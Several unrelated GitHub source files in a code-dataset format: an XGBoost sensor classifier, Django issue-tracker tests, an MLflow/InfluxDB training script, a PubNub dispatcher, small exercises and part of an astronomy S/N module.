random.sample(tmp_x, 50000)\n tmp_y = [idx]*len(tmp_x)\n\n train_x.extend(tmp_x)\n train_y.extend(tmp_y)\n print(\"\\t\\tThere are {} train data.\".format(len(tmp_x)))\n\n tmp_x = []\n for file in data_va:\n for row in file:\n flat_row = row.reshape(-1)\n tmp_x.append(flat_row)\n\n if idx == 4:\n tmp_x = random.sample(tmp_x, 18000)\n tmp_y = [idx]*len(tmp_x)\n valid_x.extend(tmp_x)\n valid_y.extend(tmp_y)\n print(\"\\t\\tThere are {} valid data.\".format(len(tmp_x)))\n\n self.train_x = np.array(train_x)\n self.train_y = np.array(train_y)\n self.valid_x = np.array(valid_x)\n self.valid_y = np.array(valid_y)\n self.train_num_x = len(self.train_x)\n self.valid_num_x = len(self.valid_x)\n print(\"There are {} training data.\".format(self.train_num_x))\n print(\"There are {} validation data.\".format(self.valid_num_x))\n\n\n def load_data_aug(self):\n print(\"Load prepro-data...\")\n Trans = []\n while len(Trans) < 64:\n a, b = np.random.uniform(low=-100, high=100, size=(3,)), np.random.uniform(low=-100, high=100, size=(3,))\n while np.linalg.norm(a) < 0.1 :\n a = np.random.uniform(low=-100, high=100, size=(3,))\n while np.linalg.norm(b) < 0.1 :\n b = np.random.uniform(low=-100, high=100, size=(3,))\n c = np.cross(a, b)\n b = np.cross(a, c)\n\n a = (a/np.linalg.norm(a)).reshape(-1, 1)\n b = (b/np.linalg.norm(b)).reshape(-1, 1)\n c = (c/np.linalg.norm(c)).reshape(-1, 1)\n trans = np.concatenate((a, b, c), axis=1)\n Trans.append(trans)\n self.Trans = Trans\n\n train_data_list = [\n \"Type1-GAM-training.npy\",\n \"Type2-GAM-training.npy\",\n \"Type3-GAM-training.npy\",\n \"Type4-GAM-training.npy\",\n \"Type5-GAM-training.npy\"]\n\n train_x, valid_x = [], []\n train_y, valid_y = [], []\n a = {0:[],1:[],2:[],3:[],4:[]}\n for idx, file in enumerate(train_data_list):\n data = np.load(os.path.join(self.path, file))\n # assert np.array([ np.isnan(i).astype(int).sum()!=0 for i in data.tolist()]).astype(int).sum() == 0\n data_tr, data_va = train_test_split(data.tolist(), test_size=0.2, random_state=1126)\n\n print(\"\\tThere are {} ({}+{}) log files in {} data with label {}.\".format(len(data_tr)+len(data_va), len(data_tr), len(data_va), file, idx))\n tmp_x = []\n\n for file in data_tr:\n for row in file:\n tmp_x.append(row)\n\n if idx == 4:\n tmp_x = random.sample(tmp_x, 50000)\n tmp_y = [idx]*len(tmp_x)\n\n train_x.extend(tmp_x)\n train_y.extend(tmp_y)\n print(\"\\t\\tThere are {} train data.\".format(len(tmp_x)))\n\n tmp_x = []\n for file in data_va:\n for row in file:\n tmp_x.append(row)\n\n if idx == 4:\n tmp_x = random.sample(tmp_x, 18000)\n tmp_y = [idx]*len(tmp_x)\n valid_x.extend(tmp_x)\n valid_y.extend(tmp_y)\n print(\"\\t\\tThere are {} valid data.\".format(len(tmp_x)))\n\n self.train_x = np.array(train_x)\n self.train_y = np.array(train_y)\n self.valid_x = np.array(valid_x)\n self.valid_y = np.array(valid_y)\n print(self.train_x.shape)\n for i in range(3):\n new_train_x = self.random_rotate(np.array(train_x))\n self.train_x = np.concatenate((self.train_x,new_train_x),axis=0)\n self.train_y = np.concatenate((self.train_y,np.array(train_y)),axis=0)\n self.train_x =self.train_x.reshape(-1,128*9)\n print(self.train_x.shape)\n print(self.train_y.shape)\n self.train_num_x = len(self.train_x)\n self.valid_num_x = len(self.valid_x)\n print(\"There are {} training data.\".format(self.train_num_x))\n print(\"There are {} validation data.\".format(self.valid_num_x))\n\n def load_testdata(self):\n print(\"Load test data...\")\n test_data_list = [\n \"Type1-GAM-testing.npy\",\n \"Type2-GAM-testing.npy\",\n \"Type3-GAM-testing.npy\",\n \"Type4-GAM-testing.npy\",\n \"Type5-GAM-testing.npy\"]\n test_x,test_y = [],[]\n data_test_by_file = []\n\n for idx, testfile in enumerate(test_data_list):\n test = np.load(os.path.join(self.path, testfile))\n # assert np.array([ np.isnan(i).astype(int).sum()!=0 for i in data.tolist()]).astype(int).sum() == 0\n print(\"\\tThere are {} log files in {} data with label {}.\".format(len(test), testfile, idx))\n for file in test:\n data_test_by_file.append((file,idx))\n for row in file:\n flat_row = row.reshape(-1)\n test_x.append(flat_row.tolist())\n test_y.append(idx)\n self.test_x = np.array(test_x)\n self.test_y = np.array(test_y)\n self.test_data_by_file = data_test_by_file\n self.test_num_data = len(self.test_x)\n print(\"There are {} testing data\".format(self.test_num_data))\n\n def create_model(self):\n print(\"Create model.\")\n self.model = XGBClassifier() \n\n def random_rotate(self,x):\n trans = random.sample(self.Trans,1)[0]\n\n xg = x[:,:,:3]\n xa = x[:,:,3:6]\n xm = x[:,:,6:]\n\n n_xg = np.dot(xg,trans)\n n_xa = np.dot(xa,trans)\n n_xm = np.dot(xm,trans)\n\n out = np.concatenate((n_xg,n_xa,n_xm),axis=2)\n return out\n\n def trainInit(self):\n self.load_data()\n self.create_model()\n\n def Add_feature(self, input_data): # input_data.shape: ( N, 130, 9 )\n # embed()\n x = np.array(input_data)\n\n bs = x.shape[0]\n x0 = x[:, :-2]\n x1 = x[:, 1:-1]\n x2 = x[:, 2:]\n\n diff0 = x1 - x0\n diff1 = x2 - x1\n ddiff0 = diff1 - diff0\n\n magG = ((x0[:, :, 0]**2 + x0[:, :, 1]**2 + x0[:, :, 2]**2) ** 0.5).reshape(-1, 128, 1)\n magA = ((x0[:, :, 3]**2 + x0[:, :, 4]**2 + x0[:, :, 5]**2) ** 0.5).reshape(-1, 128, 1)\n magM = ((x0[:, :, 6]**2 + x0[:, :, 7]**2 + x0[:, :, 8]**2) ** 0.5).reshape(-1, 128, 1)\n\n return np.concatenate((x0, diff0, ddiff0, magG, magA, magM), axis=2)\n # return np.array(input_data)[:, :128, ]\n\n def train(self):\n t1 = time.time()\n self.model.fit(self.train_x,self.train_y)\n\n def save_model(self,chkptfile):\n with open(chkptfile, 'wb') as wf:\n pickle.dump(final.model, wf, protocol=pickle.HIGHEST_PROTOCOL)\n\n\n def load_model(self, chkptfile):\n with open(chkptfile, 'rb') as rf:\n self.model = pickle.load(rf)\n\n def test(self):\n self.load_testdata()\n print(\"------------------{}-------------------\".format(\"Test By Each 128 \"))\n pred = self.model.predict(self.test_x)\n test_acc, label_list, pred_list, test_c_acc, test_len = [], [], [], [], 0\n\n acc = (pred==self.test_y)\n test_acc.extend(acc)\n print(\"test_acc {:.2f}%\".format(np.mean(test_acc)*100))\n for c in range(5):\n label_arr = np.array(self.test_y)\n c_loc = np.nonzero(label_arr == c) \n test_c_acc.append(np.mean(np.equal(pred[c_loc], c)))\n print(\"test_type {} acc {:.2f}%\".format(c, test_c_acc[-1]*100))\n return np.mean(test_acc), test_c_acc\n\n def test_by_file(self):\n #self.load_testdata()\n print(\"------------------{}-------------------\".format(\"Test By Each File \"))\n f_acc = [[] for i in range(5)]\n for file, idx in self.test_data_by_file:\n file_test_x = []\n for row in file:\n file_test_x.append(row.reshape(-1))\n file_test_y = np.array([idx]*len(file_test_x))\n file_test_x = np.array(file_test_x)\n file_pred = []\n pred = self.model.predict(file_test_x)\n acc = np.mean(np.equal(pred,file_test_y))\n f_acc[idx].append(acc)\n # print(file_pred)\n # print(idx)\n # input()\n t = []\n for c in range(5):\n t.extend(f_acc[c])\n print(\"test_acc {:.2f}%\".format(np.mean(t)*100))\n for c in range(5):\n print(\"test_type {} acc {:.2f}%\".format(c, np.mean(f_acc[c])*100))\n print(\"-------------------------------------------------------\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-dp', '--data_path', type=str, default='data')\n parser.add_argument('-e', '--epochs', type=int, default=5)\n parser.add_argument('-b', '--batch_size', type=int, default=64)\n parser.add_argument('-lr', '--lr_rate', type=float, default=1e-4)\n parser.add_argument('-md', '--model_dump', type=str, default='chkpt/xgb_aug.pickle')\n parser.add_argument('-o', '--output_csv', type=str, default='output.csv')\n parser.add_argument('-p', '--print_iter', type=int, default=1e3, help='Print every p iterations')\n parser.add_argument('-s', '--save_iter', type=int, default=30, help='Save every p iterations')\n args = parser.parse_args()\n\n final = main(args)\n final.create_model()\n final.load_data_aug()\n final.train()\n final.save_model(args.model_dump)\n final.load_model(args.model_dump)\n final.test()\n final.test_by_file()\n \n sys.exit()\n\n\n \"\"\"\n final.load_data()\n t1 = time.time()\n gen = final.data_generator(64)\n for idx, (input_data, labels) in enumerate(gen):\n pass\n print(\"Spends {:2.f} seconds for generating train data with one epoch.\".format(time.time() - t1))\n \"\"\"\n","repo_name":"BaiiYuan/SDML-Final","sub_path":"XGboost/main_xgboost.py","file_name":"main_xgboost.py","file_ext":"py","file_size_in_byte":12041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2683260136","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef datas_getter():\r\n datas = []\r\n datas.append(np.genfromtxt('data_question_2a.csv', delimiter=\",\"))\r\n datas.append(np.genfromtxt('data_question_2b.csv', delimiter=\",\"))\r\n datas.append(np.genfromtxt('data_question_2c.csv', delimiter=\",\"))\r\n return datas\r\n\r\ndef data_plotter(datas):\r\n for data in datas:\r\n x_data, y_data = data[:,0], data[:,1]\r\n fig, ax=plt.subplots() \r\n ax.plot(x_data, y_data,'o')\r\n ax.axis(\"equal\")\r\n plt.show()\r\n\r\ndef discrete_mean_values(datas):\r\n x_means = []\r\n y_means = []\r\n for data in datas: \r\n x_data, y_data = data[:,0], data[:,1]\r\n x_means.append(np.mean(x_data))\r\n y_means.append(np.mean(y_data))\r\n return x_means, y_means\r\n\r\ndef correlation_finder(datas):\r\n correlations = []\r\n for data in datas:\r\n x_data, y_data = data[:,0], data[:,1]\r\n correlations.append(np.corrcoef(np.array(x_data), np.array(y_data)))\r\n return correlations\r\n\r\n\r\nif __name__ == '__main__':\r\n datas = datas_getter()\r\n data_plotter(datas)\r\n x_means, y_means = discrete_mean_values(datas)\r\n correlations = correlation_finder(datas)\r\n data_id = ['A', 'B', 'C']\r\n for data_num in range(len(datas)): print(f\"data {data_id[data_num]}: x mean{x_means[data_num]:.2f}, y mean {y_means[data_num]:.2f}, corr(x, y) = {correlations[data_num][0,1]:.2f}\")","repo_name":"modziE3/EMTH211","sub_path":"t11_Q2.py","file_name":"t11_Q2.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13885350920","text":"from ecutils.tests import MongoTestCase\nfrom ecutils.tests import MongoTestCase\nfrom ecutils.tests import MongoTestCase\nfrom ecutils.tests import MongoTestCase\nfrom ecutils.tests import MongoTestCase\n\nclass IssuesTestCase(MongoTestCase):\n\n def setUp(self):\n from accounts.tests import setUpAccounts\n from locations.tests import setUpLocations\n from resources.tests import setUpResources\n setUpAccounts(self)\n setUpLocations(self)\n setUpResources(self)\n\nclass ApiTestCase(IssuesTestCase):\n\n def test_create(self):\n\n from issues.models import Issue, \\\n SEVERITY_LOW, SEVERITY_MEDIUM, SEVERITY_HIGH, SEVERITY_CRITICAL\n from resources.models import Resource\n\n # errors on save if these resources aren't reloaded.\n # why ???\n self.resource1 = Resource.objects.get(id=self.resource1.id)\n self.resource3 = Resource.objects.get(id=self.resource3.id)\n\n # create issues\n issue, created = Issue.objects.get_or_create(\n message = 'blah blah',\n severity = SEVERITY_LOW,\n reporter = self.bob,\n related_document=self.resource1\n )\n issue.curators = [self.emma, self.hugo]\n issue.save()\n self.assertEqual(issue.related_document.title, 'title 1')\n self.assertEqual(issue.resource_owner, self.alice)\n\n issue2, created = Issue.objects.get_or_create(\n message = 'more blah blah',\n severity = SEVERITY_MEDIUM,\n reporter = self.alice,\n related_document=self.resource3\n )\n issue2.curators = [self.jorph, self.hugo]\n issue2.save()\n self.assertEqual(issue2.related_document.title, 'title 3')\n self.assertEqual(issue2.resource_owner, self.bob)\n\n self.assertTrue(Issue.objects.count() == 2)\n\n\n # send accountmessages\n\n # add some comments\n\n # check messages sent\n\n # get messages for an account\n self.assertEqual(2, Issue.objects.for_account(self.bob).count())\n self.assertEqual(1, Issue.objects.for_account(self.jorph).count())\n\n # get issues for an account\n\n # resolve issue\n\n # check messages\n\n # check resource moderation\n\n\nclass ViewsTestCase(IssuesTestCase):\n\n def setUp(self):\n super(ViewsTestCase, self).setUp()\n\n from django.test.client import Client\n\n self.client = Client()\n\n def test_no_issues(self):\n\n from django.core.urlresolvers import reverse\n\n # Can't access when we are not logged in.\n response = self.client.get(reverse('issue_list'))\n self.assertEqual(response.status_code, 302)\n\n self.client.login(username='bob', password='password')\n\n response = self.client.get(reverse('issue_list'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"You don't have any issues at the moment.\")\n\n def test_report(self):\n\n from django.core.urlresolvers import reverse\n from resources.models import Resource\n from issues.models import Issue, \\\n SEVERITY_LOW, SEVERITY_MEDIUM, SEVERITY_HIGH, SEVERITY_CRITICAL\n\n\n # Can't access when we are not logged in.\n response = self.client.get(reverse(\n 'resource_report',\n kwargs={'object_id': self.resource1.id}))\n self.assertEqual(response.status_code, 302)\n\n self.client.login(username='bob', password='password')\n\n response = self.client.get(reverse(\n 'resource_report',\n kwargs={'object_id': self.resource1.id}))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"ALISS: report %s\" % self.resource1.title)\n\n response = self.client.post(\n reverse(\n 'resource_report',\n kwargs={'object_id': self.resource1.id}),\n data={'severity': '1', 'message': 'I am reporting this now.'})\n self.assertEqual(response.status_code, 302)\n\n issue = Issue.objects.first()\n self.assertEqual(issue.severity, 1)\n self.assertEqual(issue.message, 'I am reporting this now.')\n self.assertEqual(issue.reporter, self.bob)\n self.assertEqual(issue.related_document, self.resource1)\n\n response = self.client.post(reverse('issue_list'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'I am reporting this now.')\n\n response = self.client.post(reverse('issue_detail', kwargs={'object_id': issue.id}))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'I am reporting this now.')\n\n\n\n\n# class ApiTestCase(IssuesTestCase):\n\n# def test_types(self):\n\n# from issues.models import AlertType\n\n# nt, _ = AlertType.objects.get_or_create(name=\"expired\")\n\n# def test_create(self):\n\n# from issues.models import Alert, AlertType\n\n# expired, _ = AlertType.objects.get_or_create(name=\"expired\")\n\n# accounts = [self.bob, self.alice]\n\n# Alert.objects.create_for_accounts(accounts, type=expired,\n# severity=1, message='Curation X has expired'\n# )\n\n# Alert.objects.create_for_accounts(accounts, type=\"expired\",\n# severity=1, message='Curation X has expired'\n# )\n\n# Alert.objects.create_for_accounts(accounts, type=\"test\",\n# severity=1, message='Curation X has expired'\n# )\n\n# test, created = AlertType.objects.get_or_create(name=\"expired\")\n# self.assertFalse(created)\n\n# def test_get_alerts(self):\n\n# from issues.models import Alert, AlertType\n\n# expired, _ = AlertType.objects.get_or_create(name=\"expired\")\n\n# self.assertEqual(0, Alert.objects.for_account(self.bob).count())\n\n# Alert.objects.create_for_account(self.bob, type=expired,\n# severity=1, message='Curation X has expired'\n# )\n\n# self.assertEqual(1, Alert.objects.for_account(self.bob).count())\n\n# def test_get_member_alerts(self):\n\n# from issues.models import Alert, AlertType\n\n# expired, _ = AlertType.objects.get_or_create(name=\"expired\")\n# incorrect, _ = AlertType.objects.get_or_create(name=\"incorrect\")\n\n# self.assertEqual(0, Alert.objects.for_account(self.alice).count())\n\n# # Create a notification for alice and orgnaisation1\n# Alert.objects.create_for_accounts([self.alice, self.company],\n# type=expired, severity=1, message='Curation X is going to expire')\n\n# # Create a notification for orgnanisation1\n# Alert.objects.create_for_account(self.company,\n# type=incorrect, severity=1, message='Curation Y is incorrect')\n\n# # Create a notification for alice\n# Alert.objects.create_for_account(self.alice,\n# type=expired, severity=1, message='Curation Z is going to expire')\n\n# self.assertEqual(2, Alert.objects.for_account(self.alice).count())\n# self.assertEqual(2, Alert.objects.for_account(self.company).count())\n\n# def test_group_alerts(self):\n\n# from issues.models import Alert, AlertType\n\n# expired, _ = AlertType.objects.get_or_create(name=\"expired\")\n\n# Alert.objects.create_for_accounts([self.bob, self.alice],\n# type=expired, severity=3, message='Curation X has expired')\n\n# bob_notification, = Alert.objects.for_account(self.bob)\n# alice_notification, = Alert.objects.for_account(self.alice)\n\n# self.assertEqual(bob_notification.group, alice_notification.group)\n\n# def test_severity(self):\n\n# from issues.models import Alert, AlertType\n\n# expired, _ = AlertType.objects.get_or_create(name=\"expired\")\n\n# for i in range(4):\n# for _ in range(i + 1):\n# Alert.objects.create_for_account(self.alice,\n# type=expired, severity=i, message='Expiration warning')\n\n# self.assertEqual(Alert.objects.low(self.alice).count(), 1)\n# self.assertEqual(Alert.objects.medium(self.alice).count(), 2)\n# self.assertEqual(Alert.objects.high(self.alice).count(), 3)\n# self.assertEqual(Alert.objects.critical(self.alice).count(), 4)\n\n# def test_related_document(self):\n\n# from issues.models import Alert, AlertType\n\n# account, _ = AlertType.objects.get_or_create(name=\"account\")\n\n# notification = Alert.objects.create_for_account(self.alice,\n# type=account, severity=1, message=\"Password about to expire\",\n# related_document=self.alice)\n\n# self.assertEqual(notification.related_document, self.alice)\n\n\n# class ViewsTestCase(AlertsTestCase):\n\n# def setUp(self):\n# super(ViewsTestCase, self).setUp()\n\n# from django.test.client import Client\n\n# self.client = Client()\n\n# def test_no_alerts(self):\n\n# from django.core.urlresolvers import reverse\n\n# # Can't access when we are not logged in.\n# response = self.client.get(reverse('alerts-list'))\n# self.assertEqual(response.status_code, 302)\n\n# self.client.login(username='bob', password='password')\n\n# response = self.client.get(reverse('alerts-list'))\n# self.assertEqual(response.status_code, 200)\n# self.assertContains(response, \"You don't have any alerts\")\n\n# def test_alerts_list(self):\n\n# from django.core.urlresolvers import reverse\n# from issues.models import Alert, AlertType\n\n# expired, _ = AlertType.objects.get_or_create(name=\"expired\")\n# account, _ = AlertType.objects.get_or_create(name=\"account\")\n\n# Alert.objects.create_for_account(self.bob, type=expired,\n# severity=1, message='Curation X has expired')\n\n# Alert.objects.create_for_account(self.bob,\n# type=account, severity=1, message=\"Password about to expire\",\n# related_document=self.bob)\n\n# self.client.login(username='bob', password='password')\n\n# response = self.client.get(reverse('alerts-list'))\n# self.assertEqual(response.status_code, 200)\n# self.assertContains(response, \"Curation X has expired\")\n# self.assertContains(response, \"Bob\")\n\n# def test_detail_view(self):\n\n# from django.core.urlresolvers import reverse\n# from issues.models import Alert, AlertType\n\n# expired, _ = AlertType.objects.get_or_create(name=\"expired\")\n\n# n = Alert.objects.create_for_account(self.bob, type=expired,\n# severity=1, message='Curation X has expired')\n\n# self.client.login(username='bob', password='password')\n\n# response = self.client.get(reverse('alerts-detail', args=[\"NOTREAL\", ]))\n# self.assertEqual(response.status_code, 404)\n\n# response = self.client.get(reverse('alerts-detail', args=[str(n.id), ]))\n# self.assertEqual(response.status_code, 200)\n# self.assertContains(response, \"Curation X has expired\")\n\n\n# class ReportingTestCase(AlertsTestCase):\n\n# def setUp(self):\n# super(ReportingTestCase, self).setUp()\n\n# from resources.models import Resource\n\n# self.resource, _ = Resource.objects.get_or_create(\n# __raw__={'_id': u'4d135708e999fb30d8000007'},\n# defaults={'title': \"Testing resource\", 'owner': self.bob})\n\n# from django.test.client import Client\n# self.client = Client()\n\n# def test_annon_report(self):\n\n# from django.core.urlresolvers import reverse\n# from issues.models import Alert, SEVERITY_MEDIUM\n\n# # Check there are no alerts.\n# self.assertEqual(Alert.objects.count(), 0)\n\n# # Trigger the report, which will add a notification for the user\n# # so they know it has been submitted\n# report_url = reverse('resource-report', args=[self.resource.id])\n# response = self.client.post(report_url, {\n# 'message': 'The resource contains incorrect information.'\n# }, follow=True)\n# self.assertEqual(response.status_code, 200)\n\n# # Bob should have one notification, because he is the owner of the\n# # resource.\n# alerts = Alert.objects.for_account(self.bob)\n# self.assertEqual(len(alerts), 1)\n# self.assertEqual(alerts[0].related_document, self.resource)\n# self.assertEqual(alerts[0].severity, SEVERITY_MEDIUM)\n# self.assertEqual(alerts[0].group, None)\n\n# def test_user_report(self):\n\n# from django.core.urlresolvers import reverse\n# from issues.models import Alert, SEVERITY_HIGH\n\n# self.client.login(username='alice', password='password')\n\n# # Check there are no alerts.\n# self.assertEqual(Alert.objects.count(), 0)\n\n# # Trigger the report, which will add a notification for the user\n# # so they know it has been submitted\n# report_url = reverse('resource-report', args=[self.resource.id])\n# response = self.client.post(report_url, {\n# 'message': 'The resource contains incorrect information.'\n# }, follow=True)\n# self.assertEqual(response.status_code, 200)\n\n# # Check the notification is in the list for the user\n# response = self.client.get(reverse('alerts-list',))\n# self.assertEqual(response.status_code, 200)\n# self.assertContains(response, \"Report submitted\")\n\n# # Alice should have one notification that is bound to the resource.\n# # This notification shows that she submitted the report and can then\n# # track it later.\n# alice_alerts = Alert.objects.for_account(self.alice)\n# self.assertEqual(len(alice_alerts), 1)\n# alice_notification = alice_alerts[0]\n# self.assertEqual(alice_notification.related_document, self.resource)\n\n# # Bob should have one notification, because he is the owner of the\n# # resource.\n# bob_alerts = Alert.objects.for_account(self.bob)\n# self.assertEqual(len(bob_alerts), 1)\n# bob_notification = bob_alerts[0]\n# self.assertEqual(bob_notification.related_document, self.resource)\n# self.assertEqual(bob_notification.severity, SEVERITY_HIGH)\n\n# # Check the two alerts are in the same group.\n# self.assertEqual(alice_notification.group, bob_notification.group)\n","repo_name":"snowcloud/engineclub","sub_path":"engineclub/apps/engine/issues/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":14435,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"33800230608","text":"from influxdb import InfluxDBClient\nimport pandas as pd\nimport numpy as np\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import LinearRegression, Ridge, Lasso\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, r2_score\nimport mlflow\nimport mlflow.sklearn\nimport mytransformers\nfrom sklearn.model_selection import TimeSeriesSplit\n\nimport os, warnings, sys\n\nimport logging\nlogging.basicConfig(level = logging.WARN)\nlogger = logging.getLogger(__name__)\n\ndef eval_metrics(actual, pred):\n rmse = np.sqrt(mean_squared_error(actual, pred))\n mae = mean_absolute_error(actual, pred)\n r2 = r2_score(actual, pred)\n return rmse, mae, r2\n\ndef get_data(weeks = 8):\n client = InfluxDBClient(host = 'influxus.itu.dk', port = 8086, username = 'lsda', password = 'icanonlyread')\n client.switch_database('orkney')\n\n results = client.query('SELECT * FROM \"Generation\" where time > now() - {}w ORDER BY time'.format(str(weeks)))\n points = results.get_points()\n values = results.raw['series'][0][\"values\"]\n columns = results.raw['series'][0][\"columns\"]\n return pd.DataFrame(values, columns = columns).set_index(\"time\")\n\n\nif __name__ == '__main__':\n # handle params\n weeks = int(sys.argv[1] if len(sys.argv) > 1 else 8)\n hours = int(sys.argv[2] if len(sys.argv) > 2 else 3)\n alpha = float(sys.argv[3] if len(sys.argv) > 3 else 0.5)\n\n generation_df = get_data(weeks)\n\n # prepare data\n pre_pipeline = Pipeline([\n ('date_worker', mytransformers.DateTransformer()),\n ('shifter', mytransformers.Shifter())\n ])\n\n processed_data = pre_pipeline.fit_transform(generation_df, shifter__hours = hours)\n features = processed_data[0]\n labels = processed_data[1]\n\n # start mlflow run\n with mlflow.start_run():\n # cross validation\n tscv = TimeSeriesSplit(5)\n for train_index, test_index in tscv.split(labels):\n X_train, X_test = features.iloc[train_index], features.iloc[test_index]\n y_train, y_test = labels[train_index], labels[test_index]\n model = Lasso(alpha).fit(X_train, y_train)\n preds = model.predict(X_test)\n\n rmse, mae, r2 = eval_metrics(y_test, preds)\n\n mlflow.log_param(\"alpha\", alpha)\n mlflow.log_param(\"weeks\", weeks)\n mlflow.log_param(\"hours\", hours)\n\n mlflow.log_metric(\"rmse\", rmse)\n mlflow.log_metric(\"r2\", r2)\n mlflow.log_metric(\"mae\", mae)\n \n","repo_name":"gergokoncz/itu","sub_path":"4th_semester/large_scale_data/assignment4/energy_gen_forecast/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34179827272","text":"from pubnub.event_engine.models import effects\nfrom pubnub.event_engine import manage_effects\n\n\nclass Dispatcher:\n _pubnub = None\n _managed_effects_factory = None\n\n def __init__(self, event_engine) -> None:\n self._event_engine = event_engine\n self._managed_effects = {}\n self._effect_emitter = manage_effects.EmitEffect()\n\n def set_pn(self, pubnub_instance):\n self._pubnub = pubnub_instance\n self._effect_emitter.set_pn(pubnub_instance)\n\n def dispatch_effect(self, effect: effects.PNEffect):\n if not self._managed_effects_factory:\n self._managed_effects_factory = manage_effects.ManagedEffectFactory(self._pubnub, self._event_engine)\n\n if isinstance(effect, effects.PNEmittableEffect):\n self.emit_effect(effect)\n\n elif isinstance(effect, effects.PNManageableEffect):\n self.dispatch_managed_effect(effect)\n\n elif isinstance(effect, effects.PNCancelEffect):\n self.dispatch_cancel_effect(effect)\n\n def emit_effect(self, effect: effects.PNEffect):\n self._effect_emitter.emit(effect)\n\n def dispatch_managed_effect(self, effect: effects.PNEffect):\n managed_effect = self._managed_effects_factory.create(effect)\n managed_effect.run()\n self._managed_effects[effect.__class__.__name__] = managed_effect\n\n def dispatch_cancel_effect(self, effect: effects.PNEffect):\n if effect.cancel_effect in self._managed_effects:\n self._managed_effects[effect.cancel_effect].stop()\n del self._managed_effects[effect.cancel_effect]\n","repo_name":"pubnub/python","sub_path":"pubnub/event_engine/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"53"} +{"seq_id":"3318396078","text":"class Solution:\r\n def convert(self, s: str, numRows: int) -> str:\r\n if numRows < 2:\r\n return s\r\n\r\n res = ['' for _ in range(numRows)]\r\n c, flag = 0, -1\r\n for i in s:\r\n res[c] += i\r\n if c == 0 or c == numRows - 1:\r\n flag = -flag\r\n c += flag\r\n return ''.join(res)\r\n\r\n # initialize n row residual, then add each character to row one at a time.\r\n # when reach 0 or numRows, change direction.\r\n","repo_name":"BuckyOrange/leet","sub_path":"q6-zigzag-conversion/q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22592133167","text":"\nfrom django.urls import path\nfrom . import views as blog_view\n\napp_name = 'blog'\nurlpatterns = [\n path('', blog_view.index, name='index'),\n path('ajax/', blog_view.index_ajax, name='index_ajax'),\n path('upload/', blog_view.BasicUploadView.as_view(), name='upload'),\n path('/upload-detail/', blog_view.JsonDataCreateView.as_view(), name='upload-detail'),\n path('user/', blog_view.UsersView.as_view(), name='user_list'),\n path('data_for_site/', blog_view.data_for_site, name='data_for_size'),\n path('clear_database/', blog_view.clear_database, name='clear_database'),\n\n]\n\n","repo_name":"artursaliyev/core_blog","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4766904657","text":"\"\"\"\nThis file contains a couple of S/N estimation codes \n designed for use during SAMI observing runs.\n\nUPDATED: 08.04.2013, Iraklis Konstantopoulos\n - Edited to comply with new conventions in sami_utils. \n - Edited to accept new target table format. \n\n 23.08.2012, Iraklis Konstantopoulos\n - Changed name of \"sn\" function to \"sn_re\". \n - Writing new S/N code based on the secondary star observation. \n\nNOTES: 10.04.2013, Iraklis Konstantopoulos\n - I no longer return SN_all, but sn_Re, the median SN @Re. \n - Removed the SN_all array from the sn function. \n\n 26.08.2013, Iraklis Konstantopoulos\n - Updated fields for the SAMI target table. \n - Also changed all mentions of 'z' to 'zpec'. \n - Major bug fixes in case where target not found on target table. \n\n 27.08.2013, Iraklis Konstantopoulos\n - Writing surface brightness map function. \n\nFor reasons I (JTA) don't remember, this code was never quite finished\nor put into action. The intention had been to use S/N measurements to aid\nthe observers in deciding when a field was finished, but this code is not\nmentioned in the observers' instructions.\n\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\n\nimport pylab as py\nimport numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\n\n# use astropy for all astronomy related things.\nimport astropy.io.fits as pf\nimport astropy.io.ascii as tab\n\nimport sys\n\nfrom matplotlib.patches import Circle\n\n# Relative imports from sami package\nfrom .. import utils\nfrom .. import samifitting as fitting\n\n\ndef sn_map(rssin):\n \"\"\" \n Plot SNR of all 12 SAMI targets across fraction of Re. \n \n Process: \n - Deduce the noise level from the standard star: \n + obtain listed brightness, \n + use existing 2D Gauss function to get SBP,\n + (photometric aperture and aperture correction?), \n + normalise flux, \n + calculate integrated S/N for star, \n + establish noise level. \n\n - Run the SDSS-SB fuction on all targets, \n + Convert brightness to S/N, \n + Plot all 12 targets:\n - x-axis: fraction of Re (from target selection table), \n - y-axis: S/N, \n - horizontal lines @S/N=5, 10.\n \"\"\"\n\n print(\"HAY!\")\n\ndef sn_list(inlist, tablein, l1, l2, ifus='all'):\n \"\"\" \n Wrapper function to provide S/N estimates for >1 file \n \n inlist [ascii] list of files (format?)\n tablein [ascii] \n \"\"\"\n\n #To print only two decimal places in all numpy arrays\n np.set_printoptions(precision=2)\n\n files=[]\n\n for line in open(inlist):\n cols=line.split(' ')\n cols[0]=str.strip(cols[0])\n \n files.append(np.str(cols[0]))\n\n print(\"I have received\", len(files), \\\n \"files for which to calculate and combine S/N measurements.\")\n\n # Define the list of IFUs to display\n if ifus == 'all':\n IFUlist = [1,2,3,4,5,6,7,8,9,10,11,12,13]\n else:\n IFUlist = 